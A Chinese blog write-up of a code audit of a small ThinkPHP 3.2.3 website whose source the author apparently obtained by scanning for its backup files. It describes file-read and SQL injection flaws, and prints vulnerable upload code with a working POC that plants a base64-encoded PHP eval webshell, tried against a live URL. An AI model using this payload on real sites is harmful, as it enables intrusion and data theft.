百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

代码审计入门 之私密小网站

myzbx 2024-12-12 13:38 50 浏览

欢迎搜索公众号:白帽子左一

每天分享更多黑客技能,工具及体系化视频教程(免费领)

因为自己一直在学习用python编写小工具,然后看到了一些文章关于扫描网站后台备份文件的脚本

我就参照着写了好久的脚本代码,都是低效率代码

然后勉强算是写好了,运行了一下

哎、查看结果还真扫出来了两个包,还是有点用的

好了进入正题:


一、框架分析


解压发现,目录有thinkphp,在tp的基础上进行的二次开发,tp存在的漏洞肯定存在!

(因为一些文件的名字可以找到该模板、所以打码了)

查看一下tp的版本:3.2.3

Tp3.2.3 可能存在缓存漏洞、sql注入漏洞,sql注入暂时放放,缓存漏洞看看有没有。

参考一下:

https://www.bilibili.com/read/cv10345589?from=search

要存在漏洞的话,肯定需要调用tp框架的Cache::set方法,查找全局,看有没有调用。可惜没有调用,那就凉了。

二、网站结构分析


一键开启自动审计!

趁着这个时间大致浏览了一下网站的结构,它没有把全部功能写到controller里面

没有将index.php作为唯一的入口文件,可以访问其他文件进入其他控制器


它采用tp的URL_MODEL=0的模式,index.php对m传参进行清洗

网站如果访问index.php默认访问Home模块的index控制器。

而想进入后台,则要找到入口文件××.php,它的m值为默认Admin、进入admin模块。

所以要进后台,如果××.php没有改变的话,那么访问××.php就可以了。

三、漏洞代码审计

(一)、傻瓜式漏洞


明显的任意文件读取漏洞,而且出错可以报出网站根目录。

这个找到敏感信息便可以读取。


数据库账号密码就来了~

(二)、后台登录sql注入

什么??直接拼接post的值,实锤sql注入,但是不能万能钥匙登录

因为无论如何都要验证加密了的password是否正确,幸运的是这里可以用显错注入


上sqlmap跑一下就可以了。
或者添加一个用户,进入后台搞事情嘻嘻嘻。

这里暂时先不进去,看看前台有什么可以搞的。

(三)、前台sql注入

一堆sql注入,我不一一验证了,各位大佬们肯定能一眼看出来,比如以下:


都没有过滤,而且又没有使用tp的自带函数,那就凉了嘛。


(四)、前台文件上传漏洞

经过不懈的努力,终于找到了一个文件上传的漏洞,这道题有点像ctf,

看来还是要多做点ctf的题呀,多练练思维。

以下为漏洞代码:

    /**
     * 公共上传图片方法
     */
    public function Upload(){
        $base64_image_content = I("post.img");
        $image_name = I("post.name");
        $len = I("post.size");
        $baseLen = strlen($base64_image_content);
        if($len!=$baseLen)  $this->error("上传图片不完整");
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)){
            $uploadFolder  = C('UPLOADPATH').date("Ymd")."/";
            if(!is_dir($uploadFolder)){
                if(!mkdir($uploadFolder, 0755, true)){
                    $this->error('创建文件失败');
                }
            }
            $type = $result[2];
            if(empty($image_name)){
                $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
            }else{
                $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
            }
            $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
            if (file_put_contents($new_file,$img_64)){
                $this->success(complete_url($new_file));
            }
        }else{
            $this->error("图片不存在");
        }
    }
}

由图可知,代码使用tp框架的函数I() 来获取数据,具有一定的安全性,它的函数实现了html实体转化。


但是呢,这里他使用了base64的编码进行输入,所以<>都可以生效。


接下来看一下满足的条件:

1.Size的post传参和$baseLen数据长度一样,也就是size就是img传参的长度。
2.preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)//只要输入的img满足data: image/jpg;base64, 就能匹配出三个结果:
3.是否存在目录。(肯定有的~)

代码往下走就是:$type=$result[2];


也就是说type是文件后缀,那让result[2]=php不就完美了?


于是就有:data: image/php;base64



再接着这段代码:


    if(empty($image_name)){
        $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
    }else{
        $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
    }
    $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
    if (file_put_contents($new_file,$img_64)){
        $this->success(complete_url($new_file));
    }
    }else{
        $this->error("图片不存在");
    }

判断有无name传参,有就拼接目录、时间、和$type。其中type为后缀,那就OK,可以上传php文件。


最后看一下file_put_contents两个参数,$new_file 为写入的目录文件,$img_64为写入的内容。内容要是一句话木马才行。


$img_64是先进行替代操作str_replace($result[1], ‘’, $base64_image_content),再进行base64解码。


所以data: image/jpg;base64,之后的内容是一句话木马的base64的加密内容就行。


具体name的传参无关紧要,而size是要等于img的字符长度,即可触发文件上传漏洞。

总结就是,该漏洞因为太相信上传的img文件类型,而触发文件上传漏洞。


综上可得到poc为:


img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==& &name=jpg&size=63

PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==是一句话木马base加密的内容。

其中,要连接一句话木马就要知道时间戳。

本地复现:


上传的文件名是jpg_0430130105.php 文件名不难猜,月日时秒
尝试实操:

url为:http://url/index.php?m=&c=indexAjax&a=upload
poc为:

img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==&name=jpg&size=63



上传成功,看看效果:


成功。

菜刀就不连了!

开溜是不可能开溜的,后续我还会再尝试一下这个审计一下,若有其他新奇的漏洞代码,我再上传。

心得体会:

我自己通过学习了大约一星期的tp框架,才入门了这个审计

我觉得、不一定自己要有多懂代码、不一定要非得自己写一个网站

但是框架里面的应用包括内置函数这些一定要懂!

这就像一个手机app一样,基本的操作方法会了之后,你就可以找出这个app有哪些小bug。

但是像大佬一样,审计框架里的内容,那可能还有很远的路要走,一起加油吧!

相关推荐

如何设计一个优秀的电子商务产品详情页

加入人人都是产品经理【起点学院】产品经理实战训练营,BAT产品总监手把手带你学产品电子商务网站的产品详情页面无疑是设计师和开发人员关注的最重要的网页之一。产品详情页面是客户作出“加入购物车”决定的页面...

怎么在JS中使用Ajax进行异步请求?

大家好,今天我来分享一项JavaScript的实战技巧,即如何在JS中使用Ajax进行异步请求,让你的网页速度瞬间提升。Ajax是一种在不刷新整个网页的情况下与服务器进行数据交互的技术,可以实现异步加...

中小企业如何组建,管理团队_中小企业应当如何开展组织结构设计变革

前言写了太多关于产品的东西觉得应该换换口味.从码农到架构师,从前端到平面再到UI、UE,最后走向了产品这条不归路,其实以前一直再给你们讲.产品经理跟项目经理区别没有特别大,两个岗位之间有很...

前端监控 SDK 开发分享_前端监控系统 开源

一、前言随着前端的发展和被重视,慢慢的行业内对于前端监控系统的重视程度也在增加。这里不对为什么需要监控再做解释。那我们先直接说说需求。对于中小型公司来说,可以直接使用三方的监控,比如自己搭建一套免费的...

Ajax 会被 fetch 取代吗?Axios 怎么办?

大家好,很高兴又见面了,我是"高级前端进阶",由我带着大家一起关注前端前沿、深入前端底层技术,大家一起进步,也欢迎大家关注、点赞、收藏、转发!今天给大家带来的主题是ajax、fetch...

前端面试题《AJAX》_前端面试ajax考点汇总

1.什么是ajax?ajax作用是什么?AJAX=异步JavaScript和XML。AJAX是一种用于创建快速动态网页的技术。通过在后台与服务器进行少量数据交换,AJAX可以使网页实...

Ajax 详细介绍_ajax

1、ajax是什么?asynchronousjavascriptandxml:异步的javascript和xml。ajax是用来改善用户体验的一种技术,其本质是利用浏览器内置的一个特殊的...

6款可替代dreamweaver的工具_替代powerdesigner的工具

dreamweaver对一个web前端工作者来说,再熟悉不过了,像我07年接触web前端开发就是用的dreamweaver,一直用到现在,身边的朋友有跟我推荐过各种更好用的可替代dreamweaver...

我敢保证,全网没有再比这更详细的Java知识点总结了,送你啊

接下来你看到的将是全网最详细的Java知识点总结,全文分为三大部分:Java基础、Java框架、Java+云数据小编将为大家仔细讲解每大部分里面的详细知识点,别眨眼,从小白到大佬、零基础到精通,你绝...

福斯《死侍》发布新剧照 &quot;小贱贱&quot;韦德被改造前造型曝光

时光网讯福斯出品的科幻片《死侍》今天发布新剧照,其中一张是较为罕见的死侍在被改造之前的剧照,其余两张剧照都是死侍在执行任务中的状态。据外媒推测,片方此时发布剧照,预计是为了给不久之后影片发布首款正式预...

2021年超详细的java学习路线总结—纯干货分享

本文整理了java开发的学习路线和相关的学习资源,非常适合零基础入门java的同学,希望大家在学习的时候,能够节省时间。纯干货,良心推荐!第一阶段:Java基础重点知识点:数据类型、核心语法、面向对象...

不用海淘,真黑五来到你身边:亚马逊15件热卖爆款推荐!

Fujifilm富士instaxMini8小黄人拍立得相机(黄色/蓝色)扫二维码进入购物页面黑五是入手一个轻巧可爱的拍立得相机的好时机,此款是mini8的小黄人特别版,除了颜色涂装成小黄人...

2025 年 Python 爬虫四大前沿技术:从异步到 AI

作为互联网大厂的后端Python爬虫开发,你是否也曾遇到过这些痛点:面对海量目标URL,单线程爬虫爬取一周还没完成任务;动态渲染的SPA页面,requests库返回的全是空白代码;好不容易...

最贱超级英雄《死侍》来了!_死侍超燃

死侍Deadpool(2016)导演:蒂姆·米勒编剧:略特·里斯/保罗·沃尼克主演:瑞恩·雷诺兹/莫蕾娜·巴卡林/吉娜·卡拉诺/艾德·斯克林/T·J·米勒类型:动作/...

停止javascript的ajax请求,取消axios请求,取消reactfetch请求

一、Ajax原生里可以通过XMLHttpRequest对象上的abort方法来中断ajax。注意abort方法不能阻止向服务器发送请求,只能停止当前ajax请求。停止javascript的ajax请求...